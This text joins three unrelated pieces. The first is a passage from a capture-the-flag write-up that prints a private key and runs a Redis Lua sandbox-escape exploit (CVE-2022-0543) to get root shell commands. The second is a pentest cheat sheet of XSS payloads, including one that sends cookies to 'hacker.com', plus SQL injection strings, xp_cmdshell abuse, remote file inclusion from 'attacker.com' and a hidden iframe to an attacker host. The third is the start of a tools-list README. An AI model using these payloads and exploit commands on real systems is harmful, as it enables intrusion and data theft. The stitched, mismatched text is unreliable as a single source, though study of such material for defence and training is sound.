HPDeHZn0yt8fTeFAm+Ny4+8+dLXMlZM5quPoa0zBbxzMZWpSI9E6j6rPWs2sJmBBEKVLQs tfJMvuTgb3NhHvUwAAAAtyb290QHNoYXJlZAECAwQFBg== -----END OPENSSH PRIVATE KEY----- ``` Let's use it to connect to ```dan_smith``` user: ```console ┌─[evyatar@parrot]─[/hackthebox/Shared] └──╼ $ ssh -i dan_id_rsa [email protected] Linux shared 5.10.0-16-amd64 #1 SMP Debian 5.10.127-1 (2022-06-30) x86_64 The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. Last login: Thu Jul 14 14:43:34 2022 from 10.10.14.4 dan_smith@shared:~$ cat user.txt e30f6c6ce178a5f93c3bdb28566cd32b ``` And we get the user flag ```e30f6c6ce178a5f93c3bdb28566cd32b```. ### Root By checking for our ```groups``` we can see: ```console dan_smith@shared:~$ groups dan_smith developer sysadmin ``` We can see that we have access to the following file because we are in ```sysadmin``` group: ```console dan_smith@shared:~$ find / -group sysadmin 2>&1 ... /usr/local/bin/redis_connector_dev ``` Let's run it: ```console dan_smith@shared:~$ /usr/local/bin/redis_connector_dev [+] Logging to redis instance using password... INFO command result: # Server redis_version:6.0.15 redis_git_sha1:00000000 redis_git_dirty:0 redis_build_id:4610f4c3acf7fb25 redis_mode:standalone os:Linux 5.10.0-16-amd64 x86_64 arch_bits:64 multiplexing_api:epoll atomicvar_api:atomic-builtin gcc_version:10.2.1 process_id:26248 run_id:45d91cde1d63212cc5f6665d9c2bc155d829972b tcp_port:6379 uptime_in_seconds:0 uptime_in_days:0 hz:10 configured_hz:10 lru_clock:16087679 executable:/usr/bin/redis-server config_file:/etc/redis/redis.conf io_threads_active:0 <nil> ``` According to the log, we can see the binary contains the password. Let's copy the binary and run it locally: ```console ┌─[evyatar@parrot]─[/hackthebox/Shared] └──╼ $ /redis_connector_dev [+] Logging to redis instance using password... INFO command result: dial tcp [::1]:6379: connect: connection refused ``` Let's listen to port ```6379``` and run it again: ```console ┌─[evyatar@parrot]─[/hackthebox/Shared] └──╼ $ nc -lvp 6379 listening on [any] 6379 ... connect to [127.0.0.1] from localhost [127.0.0.1] 60154 *2 $4 auth $16 F2WHqJUz2WEz=Gqq ``` And we can see the password ```F2WHqJUz2WEz=Gqq```. Let's use this password to connect to ```redis``` using ```redis-cli```: ```console dan_smith@shared:~$ redis-cli --pass F2WHqJUz2WEz=Gqq Warning: Using a password with '-a' or '-u' option on the command line interface may not be safe. 127.0.0.1:6379> ``` By research, we found [CVE-2022-0543](https://thesecmaster.com/how-to-fix-cve-2022-0543-a-critical-lua-sandbox-escape-vulnerability-in-redis/) which is A Critical Lua Sandbox Escape Vulnerability In Redis. Let's use it: ```console dan_smith@shared:~$ redis-cli --pass F2WHqJUz2WEz=Gqq Warning: Using a password with '-a' or '-u' option on the command line interface may not be safe. 127.0.0.1:6379> eval 'local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io"); local io = io_l(); local f = io.popen("cat /etc/passwd", "r"); local res = f:read("*a"); f:close(); return res' 0 "root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\nbin:x:2:2:bin:/bin:/usr/sbin/nologin\nsys:x:3:3:sys:/dev:/usr/sbin/nologin\nsync:x:4:65534:sync:/bin:/bin/sync\ngames:x:5:60:games:/usr/games:/usr/sbin/nologin\nman:x:6:12:man:/var/cache/man:/usr/sbin/nologin\nlp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin\nmail:x:8:8:mail:/var/mail:/usr/sbin/nologin\nnews:x:9:9:news:/var/spool/news:/usr/sbin/nologin\nuucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin\nproxy:x:13:13:proxy:/bin:/usr/sbin/nologin\nwww-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\nbackup:x:34:34:backup:/var/backups:/usr/sbin/nologin\nlist:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin\nirc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin\ngnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin\nnobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin\n_apt:x:100:65534::/nonexistent:/usr/sbin/nologin\nsystemd-timesync:x:101:101:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin\nsystemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin\nsystemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin\nmessagebus:x:104:110::/nonexistent:/usr/sbin/nologin\nsshd:x:105:65534::/run/sshd:/usr/sbin/nologin\njames_mason:x:1000:1000:james_mason,,,:/home/james_mason:/bin/bash\nsystemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin\nmysql:x:106:112:MySQL Server,,,:/nonexistent:/bin/false\ndan_smith:x:1001:1002::/home/dan_smith:/bin/bash\nredis:x:107:114::/var/lib/redis:/usr/sbin/nologin\n" ``` And we have RCE, Let's run ```whoami```: ```console 127.0.0.1:6379> eval 'local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io"); local io = io_l(); local f = io.popen("cat /tmp/.revshell | bash", "r"); local res = f:read("*a"); f:close(); return res' 0 "root\n" ``` We are ```root```, Let's read the ```root``` flag ```console 127.0.0.1:6379> eval 'local l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io"); local io = l(); local f = io.popen("cat /root/root.txt"); local res = f:read("*a"); f:close(); return res' 0 "78b599d768d84f0339948e89c52d55fc\n" ``` And we get the root flag ```78b599d768d84f0339948e89c52d55fc```.
### Web Application Security _1.1 Cross-Site Scripting (XSS)_ ``` Reflected/Stored XSS <H1>Test</H1> //Simple test for sanitization of input <script>alert('XSS');</script> //Typical XSS test input field script <script>alert(document.cookie)</script> //Display current session cookie in alert DOM XSS - Runs on Client-side / Victim browser //If input in the URL value gets reflected in the form input field, DOM Example: site.com/donate.php#amount="><img src="aaa" onerror="alert(document.domain)"> "><svg/onload="alert(document.domain)"> //In Web Console document.forms[1].action="test.html" //Sends the form action "senddonation.php" or selected action to non-existent test.html page, if this works, can add same payload to svg tag and send cookies to attacker site. Example: site.com/donate.php#amount="><svg/onload="document.forms[1].action='//hacker.com/steal.php'"> BEEF XSS //edit the beef config file at /etc/beef-xss/config.yml Permitted UI Subnet: Allow only local machine Permitted Hooking Subnet: Allow hooking only from in-scope subnet Let BEEF listen on port 80 or 443 <script> src="http://AttackerIP:80/hook.js"></script> ``` _1.2 SQL Injection (SQLi)_ ``` Finding SQLi Test parameter with an always true and always false condition. id=2' and 'a'a='a //always true statement id=2' and 'a'='b //always false and 'a'='a' ') or 1=1; -- //space minus minus space In-band SQL Injections clientinfo.php?id=200 //changing id parameter pulls up different client profile ' UNION SELECT null,null,null; -- - //continue adding nulls until true statement is reached, test whether null variables are strings or integers, Ex. change nulls to, 'els1', 2222, 'els3' //To display output in browser select nonexistent id parameter value //Can change null variable values to return valuable information about database id=9999' UNION SELECT @@version, 2222, 'els3'; -- - http://pentestmonkey.net/category/cheat-sheet Error-based SQL Injections //When testing for SQLi returns a SQL error, can use SQL errors to return useful information id=1 or @@version=1);-- Blind SQL Injection blind2.sh 20 //checks 20 characters of query result blind3.sh 20 "Select user()" //checks 20 characters of result of custom query sent to db ``` ``` SQLMap sqlmap -u 'http://sqlmap.com/search.php?search=n' -p search --technique=U -D blogdb -T users -C username,password --dump sqlmap -r /root/bloglogin.req -p user --technique=B --banner //uses saved Burpsuite request --os-cmd and --os-shell //SQLMap takeover flags ``` ``` Advanced SQL Server Exploitation SELECT name, password FROM master..sysxlogins //MSSQL Server 2000 SELECT name, password_hash FROM master.sys.sql_logins //For MSSQL Server >=2005 EXEC master..xp_cmdshell '<command>' //Can be used to run any OS command, need sa privs //Enable xp_cmdshell as sa user or with sa privs EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; Reading the File System //Read the result of the dir command by saving output to web accessible folder EXEC master..xp_cmdshell 'dir c:\ > C:\inetpub\wwwroot\site\dir.txt'-- //can browse to dir.txt at the URL, http://site.com/dir.txt //Put file content into a table and extract the table via SQLi CREATE TABLE filecontent(line varcar(8000)); BULK INSERT filecontent FROM '<target file>'; /* Remember to drop the table after extracting it: DROP TABLE filecontent; */ Upload Files //Insert file into a table in MS SQL db CREATE TABLE HelperTable (file text) BULK INSERT HelperTable FROM 'shell.exe' WITH (codepage='RAW') //Force target DB server to retrieve file from our SQL server, read exe file from table and recreate it remotely. EXEC xp_cmdshell 'bcp "SELECT * FROM HelperTable" queryout shell.exe -c Craw -S<SQL Server Address> -U<Our Server Username> -P<Our Server Password>' Advanced MySQL Exploitation SELECT LOAD_FILE('<text file path>'); //read files by using the load_file function //Parse content of a file CREATE TABLE temptable(output longtext); LOAD DATA INFILE '/etc/passwd' INTO TABLE temptable FIELDS TERMINATED BY '\n' (output); ``` _1.3 Other Web Attack_ ``` File Inclusion/Path Traversal //Can try path traversal after having successfully uploaded a file to webapp, by attempting to browse to root folder, in Linux: Example: fileshare.com/files.php?file=../../../../../../etc/passwd Remote File Inclusion (RFI) Example: fileshare.com/files.php?file=http://attacker.com/shells/shell.txt //MSF use exploit/unix/webapp/php_include //Once backdoor uploaded via Meterpreter can use the php/exec payload to execute the backdoor, set CMD shell.exe Unrestricted File Upload //If file upload doesnt check against file extension uploads, can upload file such as shell2.php and browse to that file upload location with the cmd parameter such as: Example: fileshare.com/avatars/shell2.php?cmd=ls //Once have access to Webserver, can mount client-side attacks MSF> use auxiliary/server/browser_autopwn This will generate a URL which can be inserted via iframe to the index page. Download and edit index page, reupload. echo '<iframe src="http://AttackerIP:8081/uo3eXen8t0I1n" width=1 height=1 style="visibility:hidden; position:absolute;"></iframe>'; Profit? ```
<p align="center"> <a href="https://github.com/trimstray/the-book-of-secret-knowledge"> <img src="https://github.com/correia-jpv/fucking-the-book-of-secret-knowledge/blob/master/static/img/the-book-of-secret-knowledge-preview.png" alt="Master"> </a> </p> <p align="center">"<i>Knowledge is powerful, be careful how you use it!</i>"</p> <h4 align="center">A collection of inspiring lists, manuals, cheatsheets, blogs, hacks, one-liners, cli/web tools, and more.</h4> <br> <p align="center"> <a href="https://github.com/correia-jpv/fucking-the-book-of-secret-knowledge/pulls"> <img src="https://img.shields.io/badge/PRs-welcome-brightgreen.svg?longCache=true" alt="Pull Requests"> </a> <a href="LICENSE.md"> <img src="https://img.shields.io/badge/License-MIT-lightgrey.svg?longCache=true" alt="MIT License"> </a> </p> <p align="center"> <a href="https://twitter.com/trimstray" target="_blank"> <img src="https://img.shields.io/twitter/follow/trimstray.svg?logo=twitter"> </a> </p> <div align="center"> <sub>Created by <a href="https://twitter.com/trimstray">🌎 trimstray</a> and <a href="https://github.com/correia-jpv/fucking-the-book-of-secret-knowledge/graphs/contributors">contributors</a> </div> <br> **** ## :notebook_with_decorative_cover: &nbsp;What is it? This repository is a collection of various materials and tools that I use every day in my work. It contains a lot of useful information gathered in one piece. It is an invaluable source of knowledge for me that I often look back on. ## :restroom: &nbsp;For whom? For everyone, really. Here everyone can find their favourite tastes. But to be perfectly honest, it is aimed towards System and Network administrators, DevOps, Pentesters, and Security Researchers. ## :information_source: &nbsp;Contributing If you find something which doesn't make sense, or something doesn't seem right, please make a pull request and please add valid and well-reasoned explanations about your changes or comments. A few simple rules for this project: - inviting and clear - not tiring - useful These below rules may be better: - easy to contribute to (Markdown + HTML ...) - easy to find (simple TOC, maybe it's worth extending them?) Url marked **\*** is temporary unavailable. Please don't delete it without confirming that it has permanently expired. Before adding a pull request, please see the **[contributing guidelines](.github/CONTRIBUTING.md)**. You should also remember about this: ```diff + This repository is not meant to contain everything but only good quality stuff. ``` All **suggestions/PR** are welcome! ### Code Contributors This project exists thanks to all the people who contribute. <a href="https://github.com/correia-jpv/fucking-the-book-of-secret-knowledge/graphs/contributors"><img src="https://opencollective.com/the-book-of-secret-knowledge/contributors.svg?width=890&button=false"></a> ### Financial Contributors <p align="left"> <a href="https://opencollective.com/the-book-of-secret-knowledge" alt="Financial Contributors on Open Collective"> <img src="https://img.shields.io/opencollective/backers/the-book-of-secret-knowledge?style=for-the-badge&color=FF4500&labelColor=A9A9A9"></a> </a> <a href="https://opencollective.com/the-book-of-secret-knowledge" alt="Financial Contributors on Open Collective"> <img src="https://img.shields.io/opencollective/sponsors/the-book-of-secret-knowledge?style=for-the-badge&color=FF4500&labelColor=A9A9A9"></a> </a> </p> ## :newspaper: &nbsp;RSS Feed & Updates GitHub exposes an [RSS/Atom](https://github.com/correia-jpv/fucking-the-book-of-secret-knowledge/commits.atom) feed of the commits, which may also be useful if you want to be kept informed about all changes. ## :ballot_box_with_check: &nbsp;ToDo - [ ] Add new stuff... - [ ] Add useful shell functions - [ ] Add one-liners for collection tools (eg. CLI Tools) - [ ] Sort order in lists New items are also added on a regular basis. ## :anger: &nbsp;Table of Contents Only main chapters: - **[CLI Tools](#cli-tools-toc)** - **[GUI Tools](#gui-tools-toc)** - **[Web Tools](#web-tools-toc)** - **[Systems/Services](#systemsservices-toc)** - **[Networks](#networks-toc)** - **[Containers/Orchestration](#containersorchestration-toc)** - **[Manuals/Howtos/Tutorials](#manualshowtostutorials-toc)** - **[Inspiring Lists](#inspiring-lists-toc)** - **[Blogs/Podcasts/Videos](#blogspodcastsvideos-toc)** - **[Hacking/Penetration Testing](#hackingpenetration-testing-toc)** - **[Your daily knowledge and news](#your-daily-knowledge-and-news-toc)** - **[Other Cheat Sheets](#other-cheat-sheets-toc)** - **[Shell One-liners](#shell-one-liners-toc)** - **[Shell Tricks](#shell-tricks-toc)** - **[Shell Functions](#shell-functions-toc)** ## :trident: &nbsp;The Book of Secret Knowledge (Chapters) #### CLI Tools &nbsp;[<sup>[TOC]</sup>](#anger-table-of-contents) ##### :black_small_square: Shells <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.gnu.org/software/bash/">🌎 <b>GNU Bash</b></a> - is an sh-compatible shell that incorporates useful features from the Korn shell and C shell.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.zsh.org/">🌎 <b>Zsh</b></a> - is a shell designed for interactive use, although it is also a powerful scripting language.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://tcl-lang.org/">🌎 <b>tclsh</b></a> - is a very powerful cross-platform shell, suitable for a huge range of uses.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;13671⭐</code></b> <b><code>&nbsp;&nbsp;2327🍴</code></b> <a href="https://github.com/Bash-it/bash-it"><b>bash-it</b></a></a> - is a framework for using, developing and maintaining shell scripts and custom commands.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://ohmyz.sh/">🌎 <b>Oh My ZSH!</b></a> - is the best framework for managing your Zsh configuration.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;9633⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;845🍴</code></b> <a href="https://github.com/oh-my-fish/oh-my-fish"><b>Oh My Fish</b></a></a> - the Fishshell framework.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;35658⭐</code></b> <b><code>&nbsp;&nbsp;1513🍴</code></b> <a href="https://github.com/starship/starship"><b>Starship</b></a></a> - the cross-shell prompt written in Rust.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;37957⭐</code></b> <b><code>&nbsp;&nbsp;1941🍴</code></b> <a href="https://github.com/romkatv/powerlevel10k"><b>powerlevel10k</b></a></a> - is a fast reimplementation of Powerlevel9k ZSH theme.<br> </p> ##### :black_small_square: Shell plugins <p> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;15405⭐</code></b> <b><code>&nbsp;&nbsp;1216🍴</code></b> <a href="https://github.com/rupa/z"><b>z</b></a></a> - tracks the folder you use the most and allow you to jump, without having to type the whole path.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;53796⭐</code></b> <b><code>&nbsp;&nbsp;2212🍴</code></b> <a href="https://github.com/junegunn/fzf"><b>fzf</b></a></a> - is a general-purpose command-line fuzzy finder.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;27048⭐</code></b> <b><code>&nbsp;&nbsp;1746🍴</code></b> <a href="https://github.com/zsh-users/zsh-autosuggestions"><b>zsh-autosuggestions</b></a></a> - Fish-like autosuggestions for Zsh.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;17515⭐</code></b> <b><code>&nbsp;&nbsp;1306🍴</code></b> <a href="https://github.com/zsh-users/zsh-syntax-highlighting"><b>zsh-syntax-highlighting</b></a></a> - Fish shell like syntax highlighting for Zsh.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;13272⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;515🍴</code></b> <a href="https://github.com/unixorn/awesome-zsh-plugins"><b>Awesome ZSH Plugins</b></a></a> - A list of frameworks, plugins, themes and tutorials for ZSH.<br> </p> ##### :black_small_square: Managers <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://midnight-commander.org/">🌎 <b>Midnight Commander</b></a> - is a visual file manager, licensed under GNU General Public License.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;13802⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;849🍴</code></b> <a href="https://github.com/ranger/ranger"><b>ranger</b></a></a> - is a VIM-inspired filemanager for the console.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;16803⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;707🍴</code></b> <a href="https://github.com/jarun/nnn"><b>nnn</b></a></a> - is a tiny, lightning fast, feature-packed file manager.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.gnu.org/software/screen/">🌎 <b>screen</b></a> - is a full-screen window manager that multiplexes a physical terminal.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;?⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;?🍴</code></b> <a href="https://github.com/tmux/tmux/wiki"><b>tmux</b></a></a> - is a terminal multiplexer, lets you switch easily between several programs in one terminal.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;&nbsp;197⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;&nbsp;37🍴</code></b> <a href="https://github.com/peikk0/tmux-cssh"><b>tmux-cssh</b></a></a> - is a tool to set comfortable and easy to use functionality, clustering and synchronizing tmux-sessions.<br> </p> ##### :black_small_square: Text editors <p> &nbsp;&nbsp;:small_orange_diamond: <a href="http://ex-vi.sourceforge.net/"><b>vi</b></a> - is one of the most common text editors on Unix.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.vim.org/">🌎 <b>vim</b></a> - is a highly configurable text editor.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.gnu.org/software/emacs/">🌎 <b>emacs</b></a> - is an extensible, customizable, free/libre text editor, and more.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;21928⭐</code></b> <b><code>&nbsp;&nbsp;1135🍴</code></b> <a href="https://github.com/zyedidia/micro"><b>micro</b></a></a> - is a modern and intuitive terminal-based text editor.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://neovim.io/">🌎 <b>neovim</b></a> - is a free open source, powerful, extensible and usable code editor.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.spacemacs.org/">🌎 <b>spacemacs</b></a> - a community-driven Emacs distribution.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://spacevim.org/">🌎 <b>spacevim</b></a> - a community-driven vim distribution.<br> </p> ##### :black_small_square: Files and directories <p> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;28501⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;726🍴</code></b> <a href="https://github.com/sharkdp/fd"><b>fd</b></a></a> - is a simple, fast and user-friendly alternative to find.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://dev.yorhel.nl/ncdu">🌎 <b>ncdu</b></a> - is an easy to use, fast disk usage analyzer.<br> </p> ##### :black_small_square: Network <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.putty.org/">🌎 <b>PuTTY</b></a> - is an SSH and telnet client, developed originally by Simon Tatham.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://mosh.org/">🌎 <b>Mosh</b></a> - is a SSH wrapper designed to keep a SSH session alive over a volatile connection.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://eternalterminal.dev/">🌎 <b>Eternal Terminal</b></a> - enables mouse-scrolling and tmux commands inside the SSH session.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://nmap.org/">🌎 <b>nmap</b></a> - is a free and open source (license) utility for network discovery and security auditing.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;4954⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;881🍴</code></b> <a href="https://github.com/zmap/zmap"><b>zmap</b></a></a> - is a fast single packet network scanner designed for Internet-wide network surveys.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;10545⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;749🍴</code></b> <a href="https://github.com/RustScan/RustScan"><b>Rust Scan</b></a></a> - to find all open ports faster than Nmap.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;21466⭐</code></b> <b><code>&nbsp;&nbsp;2959🍴</code></b> <a href="https://github.com/robertdavidgraham/masscan"><b>masscan</b></a></a> - is the fastest Internet port scanner, spews SYN packets asynchronously.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;&nbsp;149⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;&nbsp;44🍴</code></b> <a href="https://github.com/gvb84/pbscan"><b>pbscan</b></a></a> - is a faster and more efficient stateless SYN scanner and banner grabber.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://www.hping.org/"><b>hping</b></a> - is a command-line oriented TCP/IP packet assembler/analyzer.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;2339⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;325🍴</code></b> <a href="https://github.com/traviscross/mtr"><b>mtr</b></a></a> - is a tool that combines the functionality of the 'traceroute' and 'ping' programs in a single tool.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;2663⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;233🍴</code></b> <a href="https://github.com/mehrdadrad/mylg"><b>mylg</b></a></a> - utility which combines the functions of the different network probes in one diagnostic tool.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://netcat.sourceforge.net/"><b>netcat</b></a> - utility which reads and writes data across network connections, using the TCP/IP protocol.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://www.dest-unreach.org/socat/"><b>socat</b></a> - utility which transfers data between two objects.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.tcpdump.org/">🌎 <b>tcpdump</b></a> - is a powerful command-line packet analyzer.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.wireshark.org/docs/man-pages/tshark.html">🌎 <b>tshark</b></a> - is a tool that allows us to dump and analyze network traffic (wireshark cli).<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://termshark.io/">🌎 <b>Termshark</b></a> - is a simple terminal user-interface for tshark.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;&nbsp;758⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;&nbsp;97🍴</code></b> <a href="https://github.com/jpr5/ngrep"><b>ngrep</b></a></a> - is like GNU grep applied to the network layer.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://netsniff-ng.org/"><b>netsniff-ng</b></a> - is a Swiss army knife for your daily Linux network plumbing if you will.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;&nbsp;257⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;&nbsp;38🍴</code></b> <a href="https://github.com/mechpen/sockdump"><b>sockdump</b></a></a> - dump unix domain socket traffic.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;1774⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;237🍴</code></b> <a href="https://github.com/google/stenographer"><b>stenographer</b></a></a> - is a packet capture solution which aims to quickly spool all packets to disk.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;&nbsp;402⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;&nbsp;24🍴</code></b> <a href="https://github.com/sachaos/tcpterm"><b>tcpterm</b></a></a> - visualize packets in TUI.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;1067⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;102🍴</code></b> <a href="https://github.com/tgraf/bmon"><b>bmon</b></a></a> - is a monitoring and debugging tool to capture networking related statistics and prepare them visually.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://iptraf.seul.org/2.6/manual.html#installation"><b>iptraf-ng</b></a> - is a console-based network monitoring program for Linux that displays information about IP traffic.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;1179⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;118🍴</code></b> <a href="https://github.com/vergoh/vnstat"><b>vnstat</b></a></a> - is a network traffic monitor for Linux and BSD.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://iperf.fr/">🌎 <b>iPerf3</b></a> - is a tool for active measurements of the maximum achievable bandwidth on IP networks.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;5657⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;374🍴</code></b> <a href="https://github.com/Microsoft/Ethr"><b>ethr</b></a></a> - is a Network Performance Measurement Tool for TCP, UDP & HTTP.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;&nbsp;167⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;&nbsp;20🍴</code></b> <a href="https://github.com/jwbensley/Etherate"><b>Etherate</b></a></a> - is a Linux CLI based Ethernet and MPLS traffic testing tool.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;3805⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;506🍴</code></b> <a href="https://github.com/mpolden/echoip"><b>echoip</b></a></a> - is a IP address lookup service.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;&nbsp;446⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;&nbsp;62🍴</code></b> <a href="https://github.com/troglobit/nemesis"><b>Nemesis</b></a></a> - packet manipulation CLI tool; craft and inject packets of several protocols.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;&nbsp;371⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;&nbsp;92🍴</code></b> <a href="https://github.com/packetfu/packetfu"><b>packetfu</b></a></a> - a mid-level packet manipulation library for Ruby.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://scapy.net/">🌎 <b>Scapy</b></a> - packet manipulation library; forge, send, decode, capture packets of a wide number of protocols.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;11573⭐</code></b> <b><code>&nbsp;&nbsp;3234🍴</code></b> <a href="https://github.com/SecureAuthCorp/impacket"><b>impacket</b></a></a> - is a collection of Python classes for working with network protocols.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;2885⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;280🍴</code></b> <a href="https://github.com/arthepsy/ssh-audit"><b>ssh-audit</b></a></a> - is a tool for SSH server auditing.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://aria2.github.io/">🌎 <b>aria2</b></a> - is a lightweight multi-protocol & multi-source command-line download utility.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;&nbsp;198⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;&nbsp;24🍴</code></b> <a href="https://github.com/x-way/iptables-tracer"><b>iptables-tracer</b></a></a> - observe the path of packets through the iptables chains.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;&nbsp;329⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;&nbsp;68🍴</code></b> <a href="https://github.com/proabiral/inception"><b>inception</b></a></a> - a highly configurable tool to check for whatever you like against any number of hosts.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://mremoteng.org/">🌎 <b>mRemoteNG</b></a> - a fork of mRemote, multi-tabbed PuTTy on steroids!<br> </p> ##### :black_small_square: Network (DNS) <p> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;&nbsp;863⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;&nbsp;95🍴</code></b> <a href="https://github.com/farrokhi/dnsdiag"><b>dnsdiag</b></a></a> - is a DNS diagnostics and performance measurement tools.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;1423⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;198🍴</code></b> <a href="https://github.com/mschwager/fierce"><b>fierce</b></a></a> - is a DNS reconnaissance tool for locating non-contiguous IP space.<br> &nbsp;&nbsp;:small_orange_diamond: 